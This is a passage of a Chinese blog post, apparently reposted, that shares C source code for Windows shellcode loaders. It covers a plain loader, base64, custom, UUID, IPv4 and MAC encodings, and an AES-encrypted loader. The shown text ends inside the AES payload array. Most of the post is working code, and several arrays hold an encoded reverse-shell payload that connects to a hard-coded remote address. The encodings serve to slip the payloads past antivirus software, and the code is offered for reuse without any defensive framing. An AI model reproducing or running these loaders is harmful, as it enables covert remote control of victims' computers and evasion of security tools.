一组shellcode加密方式
2023-2-25 20:20:44 Author: MicroPest(查看原文) 阅读量:32 收藏

写过不少关于shellcode的文章,可以参看以前的。正好看到一组对shellcode加密手法的源码,难度不大,推荐给大家,开个脑洞。这个包含:简单的 shellcode 加载器,编码器(base64 - 自定义 - UUID - IPv4 - MAC),加密器(AES),无文件加载器(Winhttp,Sockets)。截图如下:

不多说,上代码。

1、简单加载

#include <Windows.h>

#include <stdio.h>

int main() {

// use payload/windows/x64/shell_reverse_tcp

// generate -f c 

unsigned char payload[] =

"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"

"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"

"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"

"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"

"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"

"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"

"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"

"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"

"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"

"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"

"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"

"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"

"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"

"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"

"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"

"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"

"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"

"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"

"\x63\x2e\x65\x78\x65\x00";

LPVOID alloc_mem = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

if (!alloc_mem) {

printf("Failed to Allocate memory (%u)\n", GetLastError());

return -1;

}

MoveMemory(alloc_mem, payload, sizeof(payload));

//RtlMoveMemory(alloc_mem, payload, sizeof(payload));

DWORD oldProtect;

if (!VirtualProtect(alloc_mem, sizeof(payload), PAGE_EXECUTE_READ, &oldProtect)) {

printf("Failed to change memory protection (%u)\n", GetLastError());

return -2;

}

HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);

if (!tHandle) {

printf("Failed to Create the thread (%u)\n", GetLastError());

return -3;

}

printf("\n\nalloc_mem : %p\n", alloc_mem);

WaitForSingleObject(tHandle, INFINITE);

getchar();

return 0;

}


2、Encoding:

2-1、Base64 Loading

#include <windows.h>

#include <stdio.h>

#pragma comment (lib, "Crypt32.lib")

int main(void) {

    // calc

    //const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";

    // reverse shell

    const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAATSZFuwDUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1VBQTTHJTTHASP/ASInCSP/ASInBQbrqD9/g/9VIicdqEEFYTIniSIn5QbqZpXRh/9VIgcRAAgAASbhjbWQAAAAAAEFQQVBIieJXV1dNMcBqDVlBUOL8ZsdEJFQBAUiNRCQYxgBoSInmVlBBUEFQQVBJ/8BBUEn/yE2JwUyJwUG6ecw/hv/VSDHSSP/Kiw5BugiHHWD/1bvgHSoKQbqmlb2d/9VIg8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1Q==";

    DWORD payloadLen = sizeof(payload);

    LPVOID alloc_mem = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (!alloc_mem) {

        printf("Failed to allocate memory (%u)\n", GetLastError());

        return -1;

    }

     // base64 decoding

    if (!CryptStringToBinaryA(payload, payloadLen, CRYPT_STRING_BASE64, (BYTE*)alloc_mem, &payloadLen, NULL, NULL)) {

        printf("Failed to decode the payload(%u)\n", GetLastError());

        return -2;

    }

    DWORD OldProtect;

    if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {

        printf("Failed to change memory protection (%u)\n", GetLastError());

        return -3;

    }

    ((void(*)())alloc_mem)();

    return 0;

}


2-2、Custom Encoding:

#include <Windows.h>

#include <stdio.h>

// calc

//unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4a, 0xbb, 0x3, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x4a, 0x8e, 0x8f, 0x2, 0x3, 0x1, 0x2, 0x42, 0xbc, 0x32, 0x8d, 0x70, 0x89, 0x100, 0xd7, 0xbc, 0xf2, 0xb6, 0xa4, 0x57, 0x43, 0xbb, 0xa8, 0x96, 0xbf, 0x9e, 0x101, 0xd6, 0x4a, 0x84, 0xc6, 0x29, 0x3e, 0x7, 0x7e, 0xb, 0x82, 0xfc, 0xe2, 0x76, 0x7, 0xbc, 0x49, 0x14, 0x74, 0x70, 0x6c, 0x1, 0x5b, 0x42, 0x8b, 0xdb, 0x101, 0xd6, 0x65, 0x62, 0x6e, 0x64, 0x30, 0x66, 0x7a, 0x66, 0x2 };

// reverse shell

unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4b, 0xbf, 0x79, 0x74, 0x34, 0x60, 0x35, 0x33, 0x2, 0x1, 0x43, 0x57, 0x4b, 0x8a, 0xe8, 0x49, 0x83, 0xed, 0xa2, 0x2, 0x2, 0x1, 0x4b, 0x8a, 0xe7, 0x4a, 0xbe, 0x3, 0x2, 0x5, 0xd4, 0x65, 0x5d, 0xb1, 0xf, 0x42, 0x56, 0x4a, 0x8b, 0xe5, 0x4e, 0x8a, 0xf3, 0x42, 0xbc, 0x4d, 0x79, 0x27, 0x9, 0x100, 0xd7, 0x4d, 0x8b, 0xeb, 0x6a, 0x2, 0x3, 0x1, 0x2, 0x5a, 0x43, 0xbb, 0x2b, 0x81, 0x6d, 0x1, 0x101, 0xd6, 0x52, 0x51, 0x4f, 0x32, 0xcb, 0x4e, 0x33, 0xc1, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc3, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc2, 0x43, 0xbb, 0xec, 0x10, 0xe1, 0xe1, 0x101, 0xd6, 0x4a, 0x8a, 0xc9, 0x6b, 0x12, 0x42, 0x5a, 0x4d, 0x8b, 0xe3, 0x4a, 0x8a, 0xfb, 0x42, 0xbc, 0x9a, 0xa7, 0x75, 0x63, 0x100, 0xd7, 0x49, 0x83, 0xc5, 0x42, 0x3, 0x2, 0x1, 0x4b, 0xb9, 0x65, 0x6e, 0x66, 0x1, 0x2, 0x1, 0x2, 0x1, 0x43, 0x51, 0x43, 0x51, 0x4a, 0x8a, 0xe4, 0x58, 0x59, 0x58, 0x4f, 0x32, 0xc2, 0x6b, 0xf, 0x5a, 0x43, 0x51, 0xe4, 0xfd, 0x68, 0xc8, 0x46, 0x25, 0x56, 0x2, 0x3, 0x49, 0x8f, 0x45, 0x26, 0x19, 0xc8, 0x1, 0x6a, 0x49, 0x8b, 0xe7, 0x58, 0x51, 0x43, 0x51, 0x43, 0x51, 0x43, 0x51, 0x4b, 0x100, 0xc2, 0x42, 0x52, 0x4a, 0x101, 0xc9, 0x4f, 0x8a, 0xc3, 0x4d, 0x8b, 0xc2, 0x43, 0xbb, 0x7b, 0xcd, 0x41, 0x87, 0x101, 0xd6, 0x4a, 0x32, 0xd4, 0x49, 0x101, 0xcb, 0x8d, 0xf, 0x43, 0xbb, 0xa, 0x88, 0x1f, 0x61, 0x101, 0xd6, 0xbd, 0xe1, 0x1f, 0x2b, 0xc, 0x42, 0xbc, 0xa7, 0x97, 0xbe, 0x9f, 0x100, 0xd7, 0x49, 0x85, 0xc5, 0x2a, 0x3d, 0x8, 0x7d, 0xc, 0x81, 0xfd, 0xe1, 0x77, 0x6, 0xbd, 0x48, 0x15, 0x73, 0x71, 0x6b, 0x2, 0x5a, 0x43, 0x8a, 0xdc, 0x100, 0xd7 };

DWORD payloadLen = sizeof(payload);

void Decode(unsigned char* payload) {

for (int i = 0; i < payloadLen; i++) {

if (i % 2 == 0) {

payload[i]--;

}

else {

payload[i] -= 2;

}

}

}

int main() {

LPVOID alloc_mem = VirtualAlloc(NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

if (!alloc_mem) {

printf("Failed to Allocate memory (%u)\n", GetLastError());

return -1;

}

Decode(payload);

CopyMemory(alloc_mem, payload, payloadLen);

DWORD OldProtect;

if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {

printf("Failed to Change memory protection (%u)\n", GetLastError());

return -2;

}

HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);

if (!tHandle) {

printf("Failed to create the Thread (%u)\n", GetLastError());

return -3;

}

WaitForSingleObject(tHandle, INFINITE);

return 0;

}


2-3、UUID shellcode:

// Stephan Borosh (rvrsh3ll|@424f424f) & Matt Kingstone for the technique

#include <Windows.h>

#include <stdio.h>

#include <Rpc.h>

#pragma comment(lib, "Rpcrt4.lib")

int main() {

     const char* uuids[] = {

        "e48348fc-e8f0-00c0-0000-415141505251",

        "d2314856-4865-528b-6048-8b5218488b52",

        "728b4820-4850-b70f-4a4a-4d31c94831c0",

        "7c613cac-2c02-4120-c1c9-0d4101c1e2ed",

        "48514152-528b-8b20-423c-4801d08b8088",

        "48000000-c085-6774-4801-d0508b481844",

        "4920408b-d001-56e3-48ff-c9418b348848",

        "314dd601-48c9-c031-ac41-c1c90d4101c1",

        "f175e038-034c-244c-0845-39d175d85844",

        "4924408b-d001-4166-8b0c-48448b401c49",

        "8b41d001-8804-0148-d041-5841585e595a",

        "59415841-5a41-8348-ec20-4152ffe05841",

        "8b485a59-e912-ff57-ffff-5d49be777332",

        "0032335f-4100-4956-89e6-4881eca00100",

        "e5894900-bc49-0002-04d2-645bb00d4154",

        "4ce48949-f189-ba41-4c77-2607ffd54c89",

        "010168ea-0000-4159-ba29-806b00ffd550",

        "c9314d50-314d-48c0-ffc0-4889c248ffc0",

        "41c18948-eaba-df0f-e0ff-d54889c76a10",

        "894c5841-48e2-f989-41ba-99a57461ffd5",

        "40c48148-0002-4900-b863-6d6400000000",

        "41504100-4850-e289-5757-574d31c06a0d",

        "e2504159-66fc-44c7-2454-0101488d4424",

        "6800c618-8948-56e6-5041-504150415049",

        "5041c0ff-ff49-4dc8-89c1-4c89c141ba79",

        "ff863fcc-48d5-d231-48ff-ca8b0e41ba08",

        "ff601d87-bbd5-1de0-2a0a-41baa695bd9d",

        "8348d5ff-28c4-063c-7c0a-80fbe07505bb",

        "6f721347-006a-4159-89da-ffd590909090"

    };

    HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);

    void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);

    DWORD_PTR ptr = (DWORD_PTR)alloc_mem;

    int init = sizeof(uuids) / sizeof(uuids[0]);

    for (int i = 0; i < init; i++) {

        RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr);

        if (status != RPC_S_OK) {

            printf("UuidFromStringA != RPC_S_OK\n");

            CloseHandle(alloc_mem);

            return -1;

        }

        ptr += 16;

    }

    EnumSystemLocalesA((LOCALE_ENUMPROCA)alloc_mem, 0);

    return 0;

 }


2-4、IPv4 shellcode:

#include <Windows.h>

#include <stdio.h>

#include <Ip2string.h>

#pragma comment(lib, "Ntdll.lib")

#ifndef NT_SUCCESS

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#endif

int main() {

    const char* IPv4s[] =

    {

        "252.72.131.228",

        "240.232.192.0",

        "0.0.65.81",

        "65.80.82.81",

        "86.72.49.210",

        "101.72.139.82",

        "96.72.139.82",

        "24.72.139.82",

        "32.72.139.114",

        "80.72.15.183",

        "74.74.77.49",

        "201.72.49.192",

        "172.60.97.124",

        "2.44.32.65",

        "193.201.13.65",

        "1.193.226.237",

        "82.65.81.72",

        "139.82.32.139",

        "66.60.72.1",

        "208.139.128.136",

        "0.0.0.72",

        "133.192.116.103",

        "72.1.208.80",

        "139.72.24.68",

        "139.64.32.73",

        "1.208.227.86",

        "72.255.201.65",

        "139.52.136.72",

        "1.214.77.49",

        "201.72.49.192",

        "172.65.193.201",

        "13.65.1.193",

        "56.224.117.241",

        "76.3.76.36",

        "8.69.57.209",

        "117.216.88.68",

        "139.64.36.73",

        "1.208.102.65",

        "139.12.72.68",

        "139.64.28.73",

        "1.208.65.139",

        "4.136.72.1",

        "208.65.88.65",

        "88.94.89.90",

        "65.88.65.89",

        "65.90.72.131",

        "236.32.65.82",

        "255.224.88.65",

        "89.90.72.139",

        "18.233.87.255",

        "255.255.93.73",

        "190.119.115.50",

        "95.51.50.0",

        "0.65.86.73",

        "137.230.72.129",

        "236.160.1.0",

        "0.73.137.229",

        "73.188.2.0",

        "4.210.100.91",

        "176.26.65.84",

        "73.137.228.76",

        "137.241.65.186",

        "76.119.38.7",

        "255.213.76.137",

        "234.104.1.1",

        "0.0.89.65",

        "186.41.128.107",

        "0.255.213.80",

        "80.77.49.201",

        "77.49.192.72",

        "255.192.72.137",

        "194.72.255.192",

        "72.137.193.65",

        "186.234.15.223",

        "224.255.213.72",

        "137.199.106.16",

        "65.88.76.137",

        "226.72.137.249",

        "65.186.153.165",

        "116.97.255.213",

        "72.129.196.64",

        "2.0.0.73",

        "184.99.109.100",

        "0.0.0.0",

        "0.65.80.65",

        "80.72.137.226",

        "87.87.87.77",

        "49.192.106.13",

        "89.65.80.226",

        "252.102.199.68",

        "36.84.1.1",

        "72.141.68.36",

        "24.198.0.104",

        "72.137.230.86",

        "80.65.80.65",

        "80.65.80.73",

        "255.192.65.80",

        "73.255.200.77",

        "137.193.76.137",

        "193.65.186.121",

        "204.63.134.255",

        "213.72.49.210",

        "72.255.202.139",

        "14.65.186.8",

        "135.29.96.255",

        "213.187.224.29",

        "42.10.65.186",

        "166.149.189.157",

        "255.213.72.131",

        "196.40.60.6",

        "124.10.128.251",

        "224.117.5.187",

        "71.19.114.111",

        "106.0.89.65",

        "137.218.255.213",

    };

  PCSTR Terminator = NULL;

PVOID LpBaseAddress = NULL;

PVOID LpBaseAddress2 = NULL;

NTSTATUS STATUS;

HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);

    if (!hHeap) {

        printf("Failed to create a heap (%u)\n", GetLastError());

        return -1;

    }

void* alloc_mem = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);

    if (!alloc_mem) {

        printf("Failed to allocate memory on the heap (%u)\n", GetLastError());

        return -2;

    }

DWORD_PTR ptr = (DWORD_PTR)alloc_mem;

int init = sizeof(IPv4s) / sizeof(IPv4s[0]);

for (int i = 0; i < init; i++) {

RPC_STATUS STATUS = RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE, &Terminator, (in_addr*)ptr);

if (!NT_SUCCESS(STATUS)) {

printf("[!] RtlIpv6StringToAddressA failed in %s result %x (%u)", IPv4s[i], STATUS, GetLastError());

return FALSE;

}

ptr += 4;

}

    HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);

    if (!tHandle) {

        printf("Failed to Create the thread (%u)\n", GetLastError());

        return -3;

    }

    WaitForSingleObject(tHandle, INFINITE);

    return 0;

}


2-5、MAC shellcode:

#include <Windows.h>

#include <stdio.h>

#include <Ip2string.h>

#pragma comment(lib, "Ntdll.lib")

#ifndef NT_SUCCESS

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#endif

#define _CRT_SECURE_NO_WARNINGS

#pragma warning(disable:4996)

#pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")

int Error(const char* msg) {

printf("%s (%u)", msg, GetLastError());

return 1;

}

int main() {

    const char* MAC[] =

    {

        "90-90-90-90-90-90",

        "90-90-90-90-90-90",

        "90-90-90-90-90-90",

        "90-90-90-90-90-90",

        "90-90-90-90-90-90",

        "90-90-90-90-90-90",

        "90-90-90-90-90-90"

    };

  int rowLen = sizeof(MAC) / sizeof(MAC[0]);

PCSTR Terminator = NULL;

NTSTATUS STATUS;

HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);

void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);

DWORD_PTR ptr = (DWORD_PTR)alloc_mem;

for (int i = 0; i < rowLen; i++) {

STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator, (DL_EUI48*)ptr);

if (!NT_SUCCESS(STATUS)) {

printf("[!] RtlEthernetStringToAddressA failed in %s result %x (%u)", MAC[i], STATUS, GetLastError());

return FALSE;

}

ptr += 6;

}

    HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);

    if (!tHandle) {

        printf("Failed to Create the thread (%u)\n", GetLastError());

        return -3;

    }

    WaitForSingleObject(tHandle, INFINITE);

        printf("alloc_mem\n", alloc_mem);

    getchar();

    return 0;

}


3、Encrypting:

3-1、AES:

#include <Windows.h>

#include <stdio.h>

#include <wincrypt.h>

#pragma comment (lib, "crypt32.lib")

#pragma comment(lib, "ntdll")

#define NtCurrentProcess()   ((HANDLE)-1)

#define DEFAULT_BUFLEN 4096

#ifndef NT_SUCCESS

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#endif

EXTERN_C NTSTATUS NtAllocateVirtualMemory(

    HANDLE    ProcessHandle,

    PVOID* BaseAddress,

    ULONG_PTR ZeroBits,

    PSIZE_T   RegionSize,

    ULONG     AllocationType,

    ULONG     Protect

);

EXTERN_C NTSTATUS NtProtectVirtualMemory(

    IN HANDLE ProcessHandle,

    IN OUT PVOID* BaseAddress,

    IN OUT PSIZE_T RegionSize,

    IN ULONG NewProtect,

    OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx(

    OUT PHANDLE hThread,

    IN ACCESS_MASK DesiredAccess,

    IN PVOID ObjectAttributes,

    IN HANDLE ProcessHandle,

    IN PVOID lpStartAddress,

    IN PVOID lpParameter,

    IN ULONG Flags,

    IN SIZE_T StackZeroBits,

    IN SIZE_T SizeOfStackCommit,

    IN SIZE_T SizeOfStackReserve,

    OUT PVOID lpBytesBuffer

);

EXTERN_C NTSTATUS NtWaitForSingleObject(

    IN HANDLE         Handle,

    IN BOOLEAN        Alertable,

    IN PLARGE_INTEGER Timeout

);

void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {

    HCRYPTPROV hProv;

    HCRYPTHASH hHash;

    HCRYPTKEY hKey;

    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {

        printf("Failed in CryptAcquireContextW (%u)\n", GetLastError());

        return;

    }

    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {

        printf("Failed in CryptCreateHash (%u)\n", GetLastError());

        return;

    }

    if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {

        printf("Failed in CryptHashData (%u)\n", GetLastError());

        return;

    }

    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {

        printf("Failed in CryptDeriveKey (%u)\n", GetLastError());

        return;

    }

    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen)) {

        printf("Failed in CryptDecrypt (%u)\n", GetLastError());

        return;

    }

    CryptReleaseContext(hProv, 0);

    CryptDestroyHash(hHash);

    CryptDestroyKey(hKey);

}

int main(int argc, char** argv) {

char AESkey[] = { 0x64, 0xb5, 0x31, 0xfe, 0xb3, 0x6b, 0xb3, 0x8c, 0x88, 0x6a, 0x4c, 0x38, 0xc, 0xcb, 0x19, 0x4a };

    unsigned char AESshellcode[] = { 0x8, 0x21, 0x22, 0xeb, 0xfa, 0xdb, 0x42, 0x9, 0x8e, 0x24, 0xb6, 0x10, 0xfb, 0x93, 0x5b, 0xfe, 0xc3, 0x9d, 0x75, 0x68, 0xcc, 0x35, 0xd0, 0xef, 0xfd, 0x23, 0x70, 0xe3, 0x1, 0x3d, 0x8f, 0xd0, 0xe6, 0x5b, 0x97, 0x5e, 0x79, 0x78, 0x55, 0xf9, 0xaf, 0x71, 0x67, 0x78, 0x3c, 0xd9, 0x4a, 0xe7, 0x81, 0xc, 0xe5, 0x50, 0x46, 0x47, 0xa, 0x2e, 0x79, 0x5b, 0x6f, 0x43, 0x4d, 0x10, 0x2d, 0x35, 0x93, 0x94, 0xdd, 0x8f, 0x36, 0x2d, 0x3, 0xed, 0x9, 0x33, 0xed, 0xe3, 0xe1, 0x43, 0x17, 0xb6, 0xff, 0xe9, 0x69, 0x33, 0x1c, 0x81, 0x83, 0xb, 0xbf, 0x13, 0x1c, 0x25, 0xd5, 0x2f, 0xb8, 0x90, 0x6d, 0x1e, 0xd3, 0x11, 0xd, 0x29, 0xf7, 0x13, 0xde, 0x7e, 0x71, 0x53, 0x7, 0x44, 0xf3, 0xf6, 0xf6, 0xc3, 0x54, 0xb3, 0xaa, 0xe1, 0xd6, 0xbf, 0x1e, 0xa, 0x9c, 0x25, 0x72, 0x9e, 0x8b, 0x54, 0x62, 0x1c, 0xd9, 0x72, 0xab, 0xbd, 0x30, 0x47, 0x65, 0xd2, 0x0, 0x45, 0xb, 0xc4, 0x16, 0xbb, 0x80, 0xf, 0xd4, 0x0, 0x22, 0x40, 0xd3, 0x4d, 0xbb, 0x3f, 0x64, 0xe1, 0xa8, 0x2a, 0x60, 0x1e, 0xd1, 0x0, 0xd9, 0xb3, 0x46, 0xb6, 0x1c, 0xd0, 0xe2, 0xe1, 0x7d, 0x99, 0x9f, 0x8a, 0x70, 0xd5, 0x7d, 0x9c, 0x88, 0xd, 0x2d, 0xbb, 0x4c, 0x2a, 0x3f, 0xeb, 0xfd, 0xdd, 0xad, 0x8f, 0xba, 0xcc, 0x87, 0x3, 0xcf, 0x8f, 0x15, 0x54, 0xc5, 0xc1, 0xa2, 0xcb, 0x9b, 0x14, 0xae, 0xcb, 0x8, 0xf, 0x5a, 0xae, 0x6d, 0x63, 0xf3, 0x82, 0xe2, 0xec, 0x79, 0xe0, 0x1c, 0xb1, 0x85, 0xa9, 0x22, 0xb0, 0x66, 0xe9, 0x73, 0xbe, 0xdc, 0xac, 0xdc, 0x7d, 0x2e, 0xac, 0x5d, 0x29, 0x23, 0x44, 0x11, 0xee, 0xbf, 0xc9, 0x60, 0xa2, 0x1e, 0x7, 0x6d, 0x9e, 0x56, 0xf2, 0xb4, 0x2a, 0xb6, 0x83, 0x4, 0xca, 0x7e, 0xcb, 0x7e, 0x63, 0x8a, 0x70, 0xa1, 0xe5, 0x1f, 0x6f, 0xa, 0x21, 0x2e, 0x5b, 0x4c, 0x6a, 0x62, 0x84, 0x70, 0x33, 0x84, 0xca, 0x48, 0x39, 0x6b, 0x64, 0xc6, 0x4, 0xc6, 0x6f, 0xe2, 0x6d, 0x29, 0xda, 0x78, 0x64, 0x59, 0x13, 0xfe, 0x2, 0x3, 0xd9, 0xe, 0x7e, 0x97, 0x10, 0x7c, 0xbd, 0x9a, 0xf1, 0xbf, 0xce, 0x4e, 0x4, 0xf1, 0x93, 0x25, 0x88, 0x52, 0x99, 0x44, 0xbd, 0x52, 0x7c, 0xfe, 0x2c, 0xdb, 0x50, 0x9, 0x3b, 0x2a, 0xd, 0x30, 